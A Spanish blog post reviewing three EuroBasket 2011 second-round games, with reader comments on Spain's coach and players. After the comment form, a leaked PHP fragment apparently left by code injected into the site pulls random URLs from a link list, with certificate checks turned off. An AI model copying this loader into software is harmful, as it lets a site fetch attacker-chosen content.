EuroNBAsket 2011: Lituania lo borda

08 de September de 2011 por TheDeerHunter

Comienza esta segunda fase en el grupo E. Olor a cuartos y escaso margen de error, pero no son cuartos.

Serbia 90 – Lituania 100: Ya advertíamos de los problemas defensivos de los serbios y ayer Lituania en seguida sacó el tema a la palestra. También comentábamos que lo mismo Krstic y Savanovic podrían tener problemas con juegos interiores más potentes… Valanciunas parecía ese Sabonis renacido (¿se acordarán de Petravicius?), Jankunas hizo su partido del torneo, Javtokas se puso ciego a robar y dar tapones y en general todo el equipo entraba al aro como “Pedro por su casa”. Pero es que la demostración de ayer de Lituania es para ponerla en las escuelas. El master de dirección impartido por Jasikevicius y Kalnietis fue maravilloso. Para colmo los tiradores andaban finos. Apaga y vámonos.

Tiene mérito que ayer los serbios no se llevaran un palizón de campeonato. Son muy buenos y pueden soportar un intercambio de golpes así sin hacer el ridículo pero para ganar necesitarán otra cosa.

Destacado NBA: Jonas Valanciunas 18 ptos, 5 reb, 2 tap, 1 asis, 1 rob
Destacados resto: Sarunas Jasikevicius 14 ptos, 7 asis, 3 reb (18 min); Mantas Kalnietis 19 ptos, 7 asis, 1 reb, 1 rob
Nenad Krstic 21 ptos, 4 reb, 2 tap, 1 asis

Alemania 68 – España 77: Los campeones le vieron las orejas al lobo. Un lobo en forma de alemán con apellido polaco recurrente en las pesadillas patrias o un lobo con forma de tobillo izquierdo maltrecho, por desgracia también bastante recurrente. Este enfrentamiento se está convirtiendo en un clásico europeo más allá del baloncesto. El particular entre Dirk y Pau es más que eso, pero fue el “pequeño” Marc quien esta vez impuso su ley. Como en Saitama, fue ver a su hermano mermado y surgir la bestia. Con todo, Pau, tras una primera parte pésima volvió en la reanudación a “matar o morir” y terminó decidiendo en una actuación épica. Dos Gasol es demasiado hasta para Nowitzki, y eso que Kaman le acompañó a un nivel altísimo.

La derrota suponía la eliminación para Alemania y viendo al Gasol de la primera parte y las dudas de sus compañeros se lanzaron a dar la campanada. El enésimo tres infinito (2.09m) que causa estragos, Benzing o “el nuevo Nowitzki” (¿otro más?) y nombres que nos cuesta ubicar fuera del baloncesto de selecciones (Hamann, Herber, Schaffartzik) contribuyeron a estropear la digestión a los aficionados españoles. Un reto muy complicado para Ricky o Rudy… Por suerte también anda por ahí un tal San Emeterio. Con su mejor actuación con esta camiseta se logró pasar el trago.

Destacados NBA: Marc Gasol 24 ptos, 5 reb; Pau Gasol 19 ptos, 7 reb, 2 tap, 2 rob, 1 asis
Chris Kaman 15 ptos, 12 reb, 2 tap, 2 rob, 1 asis; Dirk Nowitzki 19 ptos, 7 reb, 1 asis

Turquía 64 – Francia 68: Susto también para Francia, virtualmente clasificada. Su principal arma, el físico, contra Turquía vale de poco. Éstos dominaron el rebote cómodamente con otra sólida actuación de Asik, como también de Ilyasova. Viéndose superados en diversos aspectos los Bleus se encomendaron al talento, primero de Batum y después de Parker. El spur, haciendo honor a su camiseta NBA, supo administrar cada mínima ventaja y cada balón del que disfrutaron. El talento de este campeón es la diferencia entre la victoria y la derrota en un partido como éste. Si algo no tienen los turcos es un Tony Parker. Mientras él marcaba el ritmo, obtenía rentas por cada punto obtenido y explotaba cada punto débil que encontraba, sus rivales se obcecaban con un tiro exterior ayer ineficaz y perdían más balones de la cuenta, obsesionados con el querer y no poder igualar un marcador estrecho pero inalcanzable. Un último arreón otomano puso la victoria a tiro de tres y posesión en los últimos segundos. Tan cerca y tan lejos, porque Francia no dudó en ceder 2 tiros libres y matar el choque.

Destacado NBA: Tony Parker 20 ptos, 6 reb, 5 asis

Comenta

12 comentarios a esta entrada

  1. HisRoyalAirness dice:
    #1

    Copio lo que puse ayer en la otra entrada al terminar el partido:

    Sé que ya es la segunda vez que defiendo a Ricky pero…por qué cuando le hacen un bloqueo el segundo defensor no hacía la ayuda y los pivots no cerraban la zona?? Porque el genio de Iturriaga no paraba de echarle la culpa y esos desajustes defensivos son puramente tácticos (os acordais de CP3 haciéndole un traje a los Lakers por lo mismo?).
    Muy bien San Eme y bien Ricky dándole un poco de dinamismo al ataque e impidiendo pases fáciles a Dirk; por qué nadie intenta jugar pick&roll con el chaval? Me juego la vida a que España no entrena jugadas de ataque.
    De los “Gasoles” nada que decir; ÍDOLOS.

      Citar

  2. Nacho dice:
    #2

    Yo no me retracto de las críticas que aquí he hecho a Scariolo, pero es justo reconocer que ayer llevó bien el partido ¡hasta se dio cuenta de que Llull es un lastre hoy por hoy! Aunque sigo echando en falta SU APUESTA por Claver.
    Magnífico paso al frente de San Emeterio, ¡que dure!
    Y España con Gasol a medio gas es superior a todos los equipos, lo que no quiere decir que no nos puedan echar a la calle en un cruce con los otros con el día tonto.
    Por otro lado creo que Navarro no está fino, pero aún así es imprescindible porque agota a sus defensores y obliga en los esquemas defensivos, Marc lo sabe y se está aprovechando bien.

      Citar

  3. Nacho dice:
    #3

    Por cierto HisRoyalAirness, llevas razón en defender a Ricky. No se a quien tendrá en Minesotta, pero como sea del estilo de Xavi Pascual o Scariolo no le va a ir muy bien. Creo que el tipo de entrenador NBA le va mejor a su juego. A poco que se ponga a currar, y a mucho que entrene el tiro, puede ser un gran base allí.

      Citar

  4. Nacho dice:
    #4

    Perdón por copar los comentarios, pero tengo una pregunta Deer.
    ¿Te tragas todos los partidos para las crónicas, o tiras de resumen y estadísticas? Lo digo por que he visto un rato el Macedonia-Georgia, y acaba de terminar la 1ª parte del Rusia-Finlandia, y dan ganas de pasarse al polo acuático, a la petanca o a esas piedras con escobas que se usan por el norte.
    Si estás en ello, es decir viéndolos, pondré unas velas a todos los dioses en los que no creo (es decir todos) para que disfrutes al menos el Grecia-Eslovenia, que no se yo…

      Citar

  5. HeiNeKeN dice:
    #5

    Pues yo me he visto los 3 partidos (el Grecia-Eslovenia aun esta en juego) y este ultimo esta siendo el más “divertido”.

    El hermano pequeño de Dragic me esta sorprendiendo gratamente

      Citar

  6. TheDeerHunter dice:
    #6

    No, que va… pero trato de documentarme sobre lo que no veo.

    Hoy os confieso que no me he puesto con ninguno… pero ayer sí vi el de españa y el de lituania. Diría que éste fue el mejor partido del campeonato hasta la fecha.

    Si alguno los ha visto y se presenta voluntario para escribir las crónicas de mañana que lo diga XD

      Citar

  7. HisRoyalAirness dice:
    #7

    Sí, yo creo que Ricky tiene que entrenar bien el tiro aunque creo que es más un tema de confianza porque hace 2 años había subido su efectividad una barbaridad.
    Tampoco es lo mismo que seas uno de los recursos para tirar y te faciliten tiros a que te toque de casualidad (gracias a una de las genialidades ofensivas de Scariolo) la patata caliente en los últimos 2 segundos y te tires una piedra.
    Creo que si aumenta un poco la velocidad a la que carga el brazo y se da cuenta de que en la NBA puedes tirarte un par de triples porque sí y no pasa nada va a hacerlo perfecto. Y lo de siempre, a asistencias se va a inflar.

    Puf, yo los partidos así “menos importantes” me los pongo de vez en cuando y hay algunos infumables, no me los veo ni loco. Aunque mañana hay buen material.

      Citar

  8. HisRoyalAirness dice:
    #8

    Me estaba repasando la final de Pekín para ver a Ricky jugando en un entorno más acorde con sus características (la defensa de los americanos, contraataques y un entrenador de verdad) y el chaval es un fenómeno. Eso no se pierde.

    A quien pueda interesar, el partido online en este enlace: http://www.rtve.es/alacarta/videos/programa/final-jjoo-pekin-espana-107-118-eeuu/266605/

      Citar

  9. Txusma dice:
    #9

    PitiHurtada ha analizado la defensa de Ricky en los minutos finales. No todos los errores fueron por su culpa, hay aspectos en que se trata de un error conjunto de todo el equipo.

    http://t.co/YpreL9U

      Citar

  10. TheDeerHunter dice:
    #10

    Interesante el análisis… y posiblemente mucho más acorde con las sensaciones que se respiraron.

    Efectivamente Ricky al final resultó decisivo en defensa, pero yo me pregunto si hubiera sido malo pasar algún bloqueo por detrás del mismo, flotando al base. Me da la sensación de que en ciertos momentos hubiera sido un riesgo bien asumible. En el vídeo lo consideran error colectivo.

    Por cierto, otra cosa que insinua el vídeo es lo pésimo que están siendo los arbitrajes con los bloqueos en movimiento. A mí es una cosa que me exaspera en el baloncesto, porque lo acerca peligrosamente al rugby. Ocurre demasiado a menudo en la NBA, en playoffs.

      Citar

  11. Nacho dice:
    #11

    Terminando el tercer cuarto del España Serbia. España lo borda. Lo de Pau yo ya no se como nombrarlo. Como somos habitualmente aquí, si fuese Gasolovic diríamos que es lo mejor que se ha visto, pero como padecemos a los marcas y a los ases & company,nos cuesta decirlo.
    ¡Y todo con Scariolo de entrenador (bueno, eso dice su contrato)!

      Citar

  12. Denise dice:
    #12

    No sabía que estuvieseis escribiendo sobre el Eurobasket!

    De lo que los jodidos horarios me han permitido ver, Francia y España son las mas en forma de la competicion, que pena que en Francia nunca vayan todos, los que están mas Mickael Pietrus, Beaubois, Petro, Mahinmi y Turiaf formarían un equipo fisicamente bestial que le pondría las cosas muy difíciles a España.
    Por otra parte, leyendo articulos, blogs, foros, no sé que tiene la gente en contra de Scariolo, no sé si no le gusta su peinado o que simplemente el delito que ha cometido es que es italiano y está dirigiendo a la selección. Desde mi humilde punto de vista, lo está haciendo francamente bien, cierto que la selección juega peor que en 2006 o 2008, pero tambien es cierto que el Calderón, Rudy, Reyes e incluso Ricky (2008) de esas epocas eran infinitamente mejores que los actuales, que España contaba con un tres en condiciones como Jimenez, (y no el fantasma megapufo sin sangre de Claver) y un 4 abierto como Garbajosa, clase de jugador del que España adolece en estos momentos, y que le permitiría dejar mas espacios al pivot.
    Me parece fantastica la rotación de 8-9 jugadores, salvo que los minutos de Ricky se los daría a Sada,

    En definitiva, España es muy superior al resto de selecciones. Sólo una Francia con los citados anteriormente o una Lituania con Kleiza, Sisakauskas, y el otro Lavrinovic podrían estar a su altura.
    Si España no gana el Eurobasket, será por sus propios errores.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>